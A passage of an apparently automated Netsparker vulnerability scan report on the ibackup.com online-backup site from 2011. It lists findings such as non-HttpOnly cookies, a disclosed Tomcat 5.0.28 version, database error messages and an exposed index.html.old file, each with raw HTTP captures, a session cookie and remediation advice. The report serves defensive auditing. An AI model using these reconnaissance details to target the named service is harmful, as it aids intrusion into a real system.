//v3.0  var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;}function MM_preloadImages() { //v3.0  var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();    var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)    if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}}function MM_findObj(n, d) { //v4.0  var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {    d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);  if(!x && document.getElementById) x=document.getElementById(n); return x;}function MM_swapImage() { //v3.0  var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)   if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}}//--></SCRIPT></head><script language='JavaScript'>function confirmSubmit(thisForm){   if(isBlank(thisForm.USERNAME.value))   {  alert("Username is required");      thisForm.USERNAME.focus();	  return false;   }   if(isBlank(thisForm.PASSWORD.value))   {  alert("Password cannot be blank");      thisForm.PASSWORD.focus();	  return false;   }   if(invaliddata(thisForm.USERNAME.value))   {  alert("Special characters are not allowed in username");      thisForm.USERNAME.focus();	  return false;   }    if(invaliddata(thisForm.PASSWORD.value))   {  alert("Special characters are not allowed in password");      thisForm.PASSWORD.focus();	  return false;   }   else   {      return true ;   }}function confirmSubmit1(thisForm){   if(confirmSubmit(thisForm)==true)   {   thisForm.action= "/qmanager/servlet/LoginWebFolderServlet";	   thisForm.method="POST";	   thisForm.submit;	   return true;   }   else   {  return false;   }}function invaliddata(Str)  {     if( (Str.indexOf("\'") != -1) || (Str.indexOf('\"') != -1) ||    (Str.indexOf('#') != -1) || (Str.indexOf('&') != -1)  ||    (Str.indexOf('%') != -1) || (Str.indexOf('*') != -1)  ||    (Str.indexOf('!') != -1) || (Str.indexOf('$') != -1)  ||    (Str.indexOf('/') != -1) || (Str.indexOf('\\') != -1)  ||    (Str.indexOf('-') != -1) ||    (Str.indexOf('@') != -1)|| (Str.indexOf('?') != -1) )     { return(true);     }     else     { return (false);     }  }function isBlank(Str) {   while(''+Str.charAt(0)==' ')   Str=Str.substring(1,Str.length);   while(''+Str.charAt(Str.length-1)==' ')   Str=Str.substring(0,Str.length-1);   if (Str == '')   { return(true);   }   else   { return(false);   }; }</script><body bgcolor="#FFFFFF" text="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" onLoad="MM_preloadImages('/images/but_co3u.gif','/images/but_su3u.gif','/images/but_se3u.gif','/images/but_te3u.gif','/images/but_st3u.gif','/images/but_fq3u.gif')"><table width="100%" border="0" cellspacing="0" cellpadding="0" bgcolor="#000000" class="textsmlbk">  <tr>    <td> </td>  </tr></table><table width="100%" border="0" cellspacing="0" cellpadding="0" background="/images/grad_3ext.gif">  <tr>    <td width="776">      <table width="776" border="0" cellspacing="0" cellpadding="0" class="textsmlbk">          <tr>          <td width="103"><a href="/index.html"><img src="/images/logo_3.gif" width="103" height="43" alt="IBackup, Online backup & Online storage" border="0"></a></td>            <td width="47"><img src="/images/grad_3.gif" width="47" height="43"></td>            <td width="48"><img src="/images/cur_3.gif" width="48" height="43"></td>            <td width="414"><img src="/images/banr_3.jpg" width="414" height="43"></td>             <form>            <td background="/images/grad_3u.jpg" valign="middle" align="center" width="164">              </td> </form>          </tr>      </table>    </td>    <td background="/images/grad_3ext.gif">  </td>  </tr></table><table width="100%" border="0" cellspacing="0" cellpadding="0" bgcolor="286396">  <tr>    <td width="776">      <table width="776" border="0" cellspacing="0" cellpadding="0">        <tr>          <td width="103" valign="top"><img src="/images/logo_3u.gif" width="103" height="20"></td>          <td width="47" valign="top"><img src="/images/grad_3ua.gif" width="47" height="20"></td>          <td width="48"><img src="/images/cur_3u.gif" width="48" height="20"></td>          <td valign="top" align="right"><img name="Image11" border="0" src="/images/but_ho3u.gif" width="82" height="20" alt="Home"><a href="/profile_new.htm" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image12','','/images/but_co3u.gif',1)"><img name="Image12" border="0" src="/images/but_co3.gif" width="82" height="20" alt="Company"></a><a href="/regterms_new.htm" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image13','','/images/but_su3u.gif',1)"><img name="Image13" border="0" src="/images/but_su3.gif" width="82" height="20" alt="Sign up"></a><a href="/security_new.htm" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image14','','/images/but_se3u.gif',1)"><img name="Image14" border="0" src="/images/but_se3.gif" width="82" height="20" alt="Security"></a><a href="/terms_new.htm" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image15','','/images/but_te3u.gif',1)"><img name="Image15" border="0" src="/images/but_te3.gif" width="82" height="20" alt="Terms"></a><a href="/feedback_new.htm" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image16','','/images/but_st3u.gif',1)"><img name="Image16" border="0" src="/images/but_st3.gif" width="82" height="20" alt="Support"></a><a href="/faq.htm" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image17','','/images/but_fq3u.gif',1)"><img name="Image17" border="0" src="/images/but_fq3.gif" width="82" height="20" alt="FAQ"></a></td>        </tr>      </table>    </td>    <td> </td>  </tr></table><table width="776" border="0" cellspacing="0" cellpadding="0">  <tr>    <td width="156" valign="top" bgcolor="#E5E5E5">      <table width="156" border="0" cellspacing="1" cellpadding="0" class="textsmlbk">        <form  name="form1" action= "https://www.ibackup.com/cgi-bin/LoginCheckCgi.cgi" method="post">          <tr>             <td height="43"> </td>            <td><b class="textsmlbk">Sign in</b><br>              <span class="textsmlbk">Username:</span><span class="textsmlbk"><font size="2"></font></span>               <br>              <input type="text" name="USERNAME" size="12" maxlength="20" class="fields">              <span class="textsmlbk"><br>              Password:</span> <br>              <input type="password" name="PASSWORD" size="12" maxlength="20" class="fields">              <br>              <input type='submit' name='login' value='Login'onClick=' return confirmSubmit(document.form1)' class="formfields">              <input type='image'src="/images/but_wfs3.gif" width="71" height="17" border="0" align="absmiddle" alt="Login to WebFolders"             			  onClick=' return confirmSubmit1(document.form1)' class="formfields" name="image">              <!--<a href="/qmanager/jsp/check_webfolder.jsp"><img src="/images/but_wfs3.gif" width="89" height="17" align="absbottom" border="0" alt="Login to WebFolders" vspace="2" onClick=' return confirmSubmit(document.form1)' ></a>-->            </td>          </tr>          <tr>            <td> </td>            <td><a href="/webfolders_new.htm" class="abodysml">What is WebFolders?</a></td>          </tr>          <tr>             <td> </td>            <td><a href="/forgotpass_new.htm" class="abodysml">Forgot your Password?</a>             </td>          </tr>        </form>      </table>      <table width="156" border="0" cellspacing="1" cellpadding="0">        <tr>          <td> </td>        </tr>        <tr>           <td><a href="/tour_start_new.htm"><img src="/images/nav_to3.gif" width="154" height="21" alt="Online Backup applications tour" border="0"></a></td>        </tr>        <tr>           <td><a href="/features.htm"><img src="/images/nav_dl3.gif" width="154" height="21" alt="Online Backup and Storage application Downloads" border="0"></a></td>        </tr>        <tr>           <td class="textsmlbk"> </td>        </tr>                <tr>           <td class="textsmlbk" align="center"> </td>        </tr>        <tr>           <td class="textsmlbk" align="center"><a href="/charginghelp_new.htm#ep"><img src="../../images/promo_4_05.jpg" width="138" height="49" border="0" alt="online backup economy plans"></a></td>        </tr>        <tr>           <td class="textsmlbk" align="center"> </td>        </tr>        <tr>           <td class="textsmlbk" align="center"> </td>        </tr>        <tr>           <td class="textsmlbk" align="center"> </td>        </tr>        <tr>           <td class="textsmlbk" align="center"> </td>        </tr>      </table>      <table width="100%" border="0" cellspacing="0" cellpadding="0">        <tr>           <td align="center"> </td>        </tr>      </table>          </td>    <td valign="top" class="textsmlbk">      <table width="610" border="0" cellspacing="0" cellpadding="0" align="right">        <tr>          <td class="textsmlbk"> </td>        </tr>        <tr>          <td>            <table width="608" border="0" cellspacing="0" cellpadding="1" align="right">              <tr>                <td width="281" valign="top" bgcolor="#CCCCCC">                  <table width="281" border="0" cellspacing="0" cellpadding="0" bgcolor="#FFFFFF">                    <tr>                      <td align="center"><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="../../download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="281" height="168">                          <param name=movie value="/images/flash_3.swf">                          <param name=quality value=high>                          <embed src="/images/flash_3.swf" quality=high pluginspage="macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="281" height="168">                          </embed>                        </OBJECT><script type="text/javascript" src="ieupdate.js"></script></td>                    </tr>                  </table>                </td>                <td width="10" class="textsmlbk" bgcolor="#FFFFFF"> </td>                <td valign="top" class="textsmlbk" bgcolor="#CCCCCC" height="168">                  <table width="100%" border="0" cellspacing="0" cellpadding="5" bgcolor="#FFFFFF" height="168">                    <tr>                      <td class="textsmlbk">                        <p align="justify"><b><font color="#666666">Online Backup</font></b>:<b><font color="#666666">                          </font></b>With IBackup, Consumers and Organizations                          of all sizes can have the same enterprise-class data                          protection Fortune 500 uses to safeguard its critical                          information at a fraction of cost.<br>                        <table width="100%" border="0" cellspacing="0" cellpadding="3" class="textsmlbk">                          <tr>                            <td width="80" align="center" valign="middle"><img src="/images/ibackupEC.gif" width="56" height="105" border="0" alt="PC Magazine Editors' choice"></td>                            <td>                              <p align="justify">IBackup is 2004 PC Magazine Editors'                                choice for Online Backup Solutions.</p>                              <table width="100%" border="0" cellspacing="0" cellpadding="0" align="center">                                <tr valign="top">                                   <td align="center"> <a href="/regterms_new.htm"><img src="/images/cmd_freetrial.gif" width="99" height="35" border="0" alt="Evaluate IBackup using free trial"></a></td>                                </tr>                              </table>                            </td>                          </tr>                        </table>                      </td>                    </tr>                  </table>                </td>              </tr>              <tr>                <td colspan="3" valign="top" class="textsmlbk"> </td>              </tr>            </table>          </td>        </tr>        <tr>          <td>            <table width="100%" border="0" cellspacing="0" cellpadding="1" bgcolor="#CCCCCC">              <tr>                <td>                  <table width="100%" border="0" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF">                    <tr>                      <td class="textsmlbk">                        <p>IBackup is a secure, online storage/ backup, remote access                          and sharing solution for consumers and businesses with                          a unique combination of backup and storage functions.                          Protect your information assets with IBackup.                          ..
		 
		
		
		Cookie Not Marked As HttpOnly
		Cookie Not Marked As HttpOnly  
		
		
			
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..
			
Impact 
During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.
Actions to Take 
	
		See the remedy for solution 
		Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.  
	 
	
 
Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as 
XSS Tunnel  to bypass HTTPOnly protection.
 
External References 
		 
		
			
				
					
						- /qmanager/jsp/regterms_new.jsp
						
					 
				 
			
			
			
			
			
			
				JSESSIONID
			Request 
			GET /qmanager/jsp/regterms_new.jsp HTTP/1.1 Referer: http://www.ibackup.com/forgotpass_new.htm User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.ibackup.com Accept-Encoding: gzip, deflate
			Response 
			HTTP/1.1 302 Moved Temporarily Date: Fri, 24 Jun 2011 01:52:38 GMT Server: Apache Set-Cookie: JSESSIONID=4CF8E543D93A429E5973A72C32256C65.tomcat9; Path=/qmanager Cache-Control: no-cache Pragma: no-cache Expires: -1 Location: https://www5.ibackup.com/qmanager/jsp/SignUp_new.jsp Content-Length: 0 Content-Type: text/html
		 
		
		
		Tomcat Version Disclosure
		Tomcat Version Disclosure  
		
		
			
Netsparker identified that the target web server is Tomcat. This information was gathered from the HTTP Headers.
			
Impact 
An attacker can look for specific security vulnerabilities for the version disclosed by the SERVER header.
	Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
		 
		
			
				
					
						- /qmanager/servlet/FeedbackServlet
						
					 
				 
			
			
			
			
			
			
				Apache Tomcat/5.0.28
			Request 
			GET /qmanager/servlet/FeedbackServlet HTTP/1.1 Referer: http://www.ibackup.com/feedback_new.htm User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.ibackup.com Cookie: JSESSIONID=4CF8E543D93A429E5973A72C32256C65.tomcat9 Accept-Encoding: gzip, deflate Connection: Keep-Alive
			Response 
			HTTP/1.0 405 HTTP method GET is not supported by this URL Date: Fri, 24 Jun 2011 01:53:52 GMT Server: Apache Content-Length: 1112 Connection: close Content-Type: text/html;charset=utf-8 <html><head><title>Apache Tomcat/5.0.28 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 405 - HTTP method GET is not supported by this URL</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>HTTP method GET is not supported by this URL</u></p><p><b>description</b> <u>The specified HTTP method is not allowed for the requested resource (HTTP method GET is not supported by this URL).</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.0.28</h3></body></html>
		 
		
		
		Database Error Message
		Database Error Message  
		
		
			
Netsparker identified a database error message.
			
Impact 
	
	The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. In rare conditions this may be a clue for an SQL Injection vulnerability. Most of the time Netsparker will detect and report that problem separately.
	
	
	Do not provide any error messages on production environments. Save error messages with a reference number to a backend storage such as a text file or database, then show this number and a static user-friendly error message to the user.
	
		 
		
			
				
					
						- /online-backup-faq/faq_oracle.htm
						
					 
				 
			
			
			
			
			Request 
			GET /online-backup-faq/faq_oracle.htm HTTP/1.1 Referer: http://www.ibackup.com/online-backup-resources/index.html User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.ibackup.com Accept-Encoding: gzip, deflate
			Response 
			HTTP/1.1 200 OK Date: Fri, 24 Jun 2011 01:53:03 GMT Server: Apache Last-Modified: Thu, 26 May 2011 05:32:42 GMT ETag: "3502c1-aa6d-4ddde5fa" Accept-Ranges: bytes Content-Length: 43629 Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>FAQ - Oracle Server Backup</title> <link rel="stylesheet"  href="../includes/obk_style.css" type="text/css"> <script language="JavaScript" src="../includes/obk_AC_RunActiveContent.js"></script> <script language="JavaScript" src="../includes/obk_mm_menu.js"></script> <script language="JavaScript" src="../includes/obk_pmenu.js"></script> <script language="JavaScript" src="../includes/obk_dropDown.js"></script> <link rel="icon" href="/images/favicon.ico" type="image/x-icon" /> <link rel="shortcut icon" href="/images/favicon.ico" type="image/x-icon"  /> </head> <body> <script language="JavaScript1.2" type="text/javascript">mmLoadMenus();</script> <table width="100%" border="0" cellspacing="0" cellpadding="0">   <tr>     <td background="../images/obk_topbg.jpg"><table width="960"  border="0" align="center" cellpadding="0" cellspacing="0">         <tr>           <td width="160"><a href="../index.html"><img src="../images/obk_logo.jpg" alt="IBackup - online backup and online storage" width="159" height="105" border="0" /></a></td>           <td align="right" valign="top"><a  href="../feedback_new.htm"><img src="../images/obk_hd_support.jpg"  alt="Support" width="161" height="50" border="0" /></a></td>         </tr>       </table></td>   </tr> </table> <table width="100%" background="../images/obk_bacwin_bg.jpg" border="0" cellpadding="0" cellspacing="0">   <tr>     <td><img src="../images/obk_spacer.gif" width="2" height="9" /><br />       <table width="960" border="0" align="center" cellpadding="0" cellspacing="0" id="main_menu">         <tr>           <td id="mn_home"><a href="/index.html"><img src="../images/obk_spacer.gif" alt="Home" width="46" height="40" border="0" /></a></td>           <td id="mn_sign"><a href="/qmanager/jsp/regterms_new.jsp"><img src="../images/obk_spacer.gif" alt="Sign up" width="108" height="40" border="0" /></a></td>           <td id="mn_price"><a href="/charginghelp_new.htm"><img src="../images/obk_spacer.gif" alt="Pricing Plans" width="141" height="40" border="0" /></a></td>           <td id="mn_prod"><a href="#"><img src="../images/obk_spacer.gif" alt="Products" width="112" height="40" border="0"  name="products" onmouseover="MM_showMenu(window.mm_menu_0313114926_0,0,40,null,'products');" onmouseout="MM_startTimeout()" /></a></td>           <td id="mn_down"><a href="/online-backup-downloads"><img src="../images/obk_spacer.gif" alt="Downloads" width="131" height="40" border="0" /></a></td>           <td id="mn_secur"><a href="/online-backup-security"><img src="../images/obk_spacer.gif" alt="Security" width="106" height="40" border="0" /></a></td>           <td id="mn_supp"><a href="/feedback_new.htm"><img src="../images/obk_spacer.gif" alt="Support" width="109" height="40" border="0" /></a></td>           <td id="mn_part"><a href="/online-backup-partners"><img src="../images/obk_spacer.gif" alt="Partners" width="109" height="40" border="0" /></a></td>           <td id="mn_faq"><a href="/online-backup-faq"><img src="../images/obk_spacer.gif" alt="FAQs" width="98" height="40" border="0" /></a></td>         </tr>       </table>       <table width="960" border="0" align="center" cellpadding="0" cellspacing="0">         <tr>           <td background="../images/obk_banr_confirm.jpg" valign="top" class="backwin_confirm_banner"><table width="100%" border="0" cellspacing="0" cellpadding="0">               <tr>                 <td><h1>Frequently Asked Questions<a name="top" id="top"></a></h1></td>               </tr>             </table></td>         </tr>       </table></td>   </tr> </table> <table width="100%" border="0" cellpadding="0" cellspacing="0">   <tr>     <td background="../images/obk_subpag_bg.jpg" style="background-repeat:repeat-x;"><img src="../images/obk_spacer.gif" width="2" height="45" /><br />       <table width="960" border="0" align="center" cellpadding="0" cellspacing="0">         <tr>           <td valign="top" width="200"><div id="faq_list"> <span class="faq_head"><a href="index.html" class="faq_head">Online Backup</a></span>             <ul class="listbullet">               <li><a href="index.html" class="rel_link">IBackup                  for Windows</a></li>               <li><a href="faqq_ibackup_mac.htm" class="rel_link">IBackup                  for Mac </a></li>               <li><a href="ibackup-for-iphone-faq.htm" class="rel_link">IBackup                  for iPhone </a></li>               <li><a href="faqq6n.htm" class="rel_link">Snapshots</a></li>               <li><a href="faqqsql.htm" class="rel_link">SQL      Server Backup</a></li>               <li><a href="faqq93a.htm" class="rel_link">Exchange                  Server Backup</a></li>               <li><a href="faq_oracle.htm" class="rel_link">Oracle                  Server Backup</a></li>               <li><a href="faqsharepoint.htm" class="rel_link">SharePoint Server Backup</a></li>               <li><a href="faqqssb.htm" class="rel_link">System                  State Backup</a></li>               <li><a href="faqqrsync.htm" class="rel_link">IBackup                  for Linux<br />                 (Command Line Interface)</a></li>             </ul>             <br />             <br />             <span class="faq_head"><a href="faqq2.htm" class="faq_head">Online Storage</a></span>             <ul class="listbullet">               <li><a href="faqq2.htm" class="rel_link">IBackup Drive</a></li>               <li><a href="faqq8n.htm" class="rel_link">IBackup Drive                  for Mac</a></li>             </ul>             <br />             <br />             <span class="faq_head"><a href="faq_webacc.htm" class="faq_head">Web Interface</a></span><b>(Web-Manager)</b>             <ul class="listbullet">               <li><a href="faq_webacc.htm" class="rel_link">File/Folder Management</a></li>               <li><a href="faq_webfold.htm" class="rel_link">WebFolders</a></li>               <li><a href="faq_share.htm" class="rel_link">Share</a></li>               <li><a href="faq_subac.htm" class="rel_link">Sub-Accounts</a></li>               <li><a href="faq_acct.htm" class="rel_link">Account Maintenance</a></li>               <li><a href="faq_report.htm" class="rel_link">Reports</a></li>               <li><a href="faq_managebkpset.htm" class="rel_link">Web Based Backup<br />                 Management</a></li>             </ul>             <br />             <a href="faqq_vista.htm" class="faq_head"><br />               Guideline FAQs</a>             <ul class="listbullet">               <li><a href="faqq_vista.htm" class="rel_link">Windows 7 and Vista</a></li>             </ul>             <br />             <br />             <span class="faq_head"><a href="fwl_ibwin.htm" class="faq_head">Firewall Guidance</a></span>             <ul class="listbullet">               <li><a href="fwl_ibwin.htm" class="rel_link">IBackup                  for Windows</a></li>               <li><a href="fwl_ibmac.htm" class="rel_link">IBackup                  for Mac</a></li>               <li><a href="fwl_ibdrive.htm" class="rel_link">IBackup Drive</a></li>             </ul>             <br />             <br />             <span class="faq_head"><a href="faqq94.htm" class="faq_head">Security</a></span>             <ul class="listbullet">               <li><a href="faqq94.htm" class="rel_link">Security                  and Encryption</a></li>             </ul>             <br />             <br />             <span class="faq_head"><a href="faqq96.htm" class="faq_head">Plans</a></span>             <ul class="listbullet">               <li><a href="faqq96.htm" class="rel_link">Subscription                  Plans</a></li>               <li><a href="faqq1.htm" class="rel_link">How                  do I decide which IBackup feature to use with my IBackup account?</a></li>               <li><a href="faqq92.htm" class="rel_link">Free                  Trial</a></li>               <li><a href="faqq97.htm" class="rel_link">Credit                  card Issues</a><br />                 <br />               </li>             </ul>             <span class="faq_head"><a href="faqq98.htm" class="faq_head">Miscellaneous</a></span><br />             <br />             <br />           </div></td>           <td width="25" class="faq_split"> </td>           <td width="680" valign="top" class="txtcontent"><TABLE WIDTH="100%" BORDER="0" CELLPADDING="0" CELLSPACING="0" class="txtcontent">               <TR>                 <TD valign="top"><table width="100%" border="0" cellspacing="0" cellpadding="0">                     <tr>                       <td width="5"> </td>                       <td class="linkbodygray"><span class="lnkmore">Oracle Server Backup/Restore</span>                         <hr />                         <br />                         <table width="100%" border="0" cellspacing="2" cellpadding="4">                           <tr>                             <td colspan="2"><span class="lnktxt">Oracle Server Backup</span><a name="top"></a></td>                           </tr>                           <tr>                             <td width="12"><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                             <td><a href="#1" class="linkbodygray">How do I backup  Oracle databases?</a></td>                           </tr>                           <tr>                             <td><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                             <td><a href="#1a" class="linkbodygray">What version of Oracle does IBackup for Windows support?</a></td>                           </tr>                           <tr>                             <td valign="top"><img src="../images/obk_bullet1.gif" width="13" height="12" vspace="3" /></td>                             <td><div align="justify"><a href="#2b" class="linkbodygray">Does IBackup for Windows support backup of   Oracle server which is running on Linux/Unix Operating system?</a></div></td>                           </tr>                           <tr>                             <td><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                             <td><a href="#2" class="linkbodygray">Does IBackup for Windows perform Incremental backup of Oracle databases?</a></td>                           </tr>                           <tr>                             <td valign="top"><img src="../images/obk_bullet1.gif" width="13" height="12" vspace="3" /></td>                             <td><div align="justify"><a href="#2a" class="linkbodygray">Can I backup Oracle server databases located at a remote location, using the IBackup for Windows application? </a></div></td>                           </tr>                           <tr>                             <td valign="top"><img src="../images/obk_bullet1.gif" width="13" height="12" vspace="3" /></td>                             <td><div align="justify"><a href="#3" class="linkbodygray">Are there any special settings that I should be aware of while performing backup/restore operation using the IBackup for Windows application?</a></div></td>                           </tr>                           <tr>                             <td valign="top"><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                             <td><a href="#4" class="linkbodygray">How do I convert the database to ARCHIVELOG Mode?</a></td>                           </tr>                           <tr>                             <td valign="top"><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                             <td><a href="#5" class="linkbodygray">Can I backup the databases from multiple instances of the Oracle server with IBackup for Windows?</a></td>                           </tr>                           <tr>                             <td valign="top"><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                             <td><a href="#6" class="linkbodygray">Can I select the Oracle server backup location on the network?</a></td>                           </tr>                           <tr>                             <td valign="top"><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                             <td><a href="#7" class="linkbodygray">Where and how should I select the remote server backup location?</a></td>                           </tr>                           <tr>                             <td valign="top"><img src="../images/obk_bullet1.gif&q..
		 
		
		
		[Possible] Backup File Found
		[Possible] Backup File Found  
		
		
			Netsparker identified a backup file on the web server.
			
Impact 
	
Backup files can contain old or current versions of a file on the web server. This could include sensitive data such as password files or even the applications source code. This form of issue normally leads to further vulnerabilities or at worse sensitive information disclosure.
	
	
	Do not store backup files on production servers.
	
		 
		
			
			
			
			
			Request 
			GET /index.html.old HTTP/1.1 Referer: http://www.ibackup.com/index.html.old User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.ibackup.com Accept-Encoding: gzip, deflate
			Response 
			HTTP/1.1 200 OK Date: Fri, 24 Jun 2011 01:55:58 GMT Server: Apache Last-Modified: Fri, 12 Nov 2004 09:02:15 GMT ETag: "10c254-588e-41947c17" Accept-Ranges: bytes Content-Length: 22670 Content-Type: text/html <html><head><title>IBackup - Online Backup and Online Storage Services. Offsite Backup and Remote Data Backup Solution.</TITLE><META NAME="KEYWORDS" CONTENT="online backup data,online data backup,online server backup,online backup service,online server backups,online data backups,backup service,online file backups,online backups,remote data backups,online backup,online file backup,online backup services"><META NAME="DESCRIPTION" CONTENT="Online Backup: Specializing in online backup services and online storage services"><META NAME="ROBOTS" CONTENT="INDEX,FOLLOW"><LINK REL=stylesheet TYPE="text/css" HREF="/images/style.css"><style>.textsmlbk {  font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; color: #000000}</style><script language="JavaScript"><!--function namosw_goto_byselect(sel, targetstr){  var index = sel.selectedIndex;  if (sel.options[index].value != '') {     if (targetstr == 'blank') {       window.open(sel.options[index].value, 'win1');     } else {       var frameobj;       if ((frameobj = eval(targetstr)) != null)       frameobj.location = sel.options[index].value;     }  }}function MM_swapImgRestore() { //v3.0  var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;}function MM_preloadImages() { //v3.0  var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();    var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)    if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}}function MM_findObj(n, d) { //v4.0  var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {    d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);  if(!x && document.getElementById) x=document.getElementById(n); return x;}function MM_swapImage() { //v3.0  var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)   if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}}//--></SCRIPT></head><script language='JavaScript'>function confirmSubmit(thisForm){   if(isBlank(thisForm.USERNAME.value))   {  alert("Username is required");      thisForm.USERNAME.focus();	  return false;   }   if(isBlank(thisForm.PASSWORD.value))   {  alert("Password cannot be blank");      thisForm.PASSWORD.focus();	  return false;   }     if(invaliddata(thisForm.USERNAME.value))   {  alert("Special characters are not allowed in username");      thisForm.USERNAME.focus();	  return false;   }    if(invaliddata(thisForm.PASSWORD.value))   {  alert("Special characters are not allowed in password");      thisForm.PASSWORD.focus();	  return false;   }   else   {  return true ;   }}function invaliddata(Str)  {     if( (Str.indexOf("\'") != -1) || (Str.indexOf('\"') != -1) ||    (Str.indexOf('#') != -1) || (Str.indexOf('&') != -1)  ||    (Str.indexOf('%') != -1) || (Str.indexOf('*') != -1)  ||    (Str.indexOf('!') != -1) || (Str.indexOf('$') != -1)  ||    (Str.indexOf('/') != -1) || (Str.indexOf('\\') != -1)  ||    (Str.indexOf('-') != -1) ||    (Str.indexOf('@') != -1)|| (Str.indexOf('?') != -1) )     { return(true);     }     else     { return (false);     }  }function isBlank(Str) {   while(''+Str.charAt(0)==' ')   Str=Str.substring(1,Str.length);   while(''+Str.charAt(Str.length-1)==' ')   Str=Str.substring(0,Str.length-1);   if (Str == '')   { return(true);   }   else   { return(false);   }; }</script><body bgcolor="#FFFFFF" text="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" onLoad="MM_preloadImages('/images/but_co3u.gif','/images/but_su3u.gif','/images/but_se3u.gif','/images/but_te3u.gif','/images/but_st3u.gif','/images/but_fq3u.gif')"><table width="100%" border="0" cellspacing="0" cellpadding="0" bgcolor="#000000" class="textsmlbk">  <tr>    <td> </td>  </tr></table><table width="100%" border="0" cellspacing="0" cellpadding="0" background="/images/grad_3ext.gif">  <tr>    <td width="776">      <table width="776" border="0" cellspacing="0" cellpadding="0" class="textsmlbk">          <tr>          <td width="103"><a href="/index.html"><img src="/images/logo_3.gif" width="103" height="43" alt="IBackup, Online backup & Online storage" border="0"></a></td>            <td width="47"><img src="/images/grad_3.gif" width="47" height="43"></td>            <td width="48"><img src="/images/cur_3.gif" width="48" height="43"></td>            <td width="414"><img src="/images/banr_3.jpg" 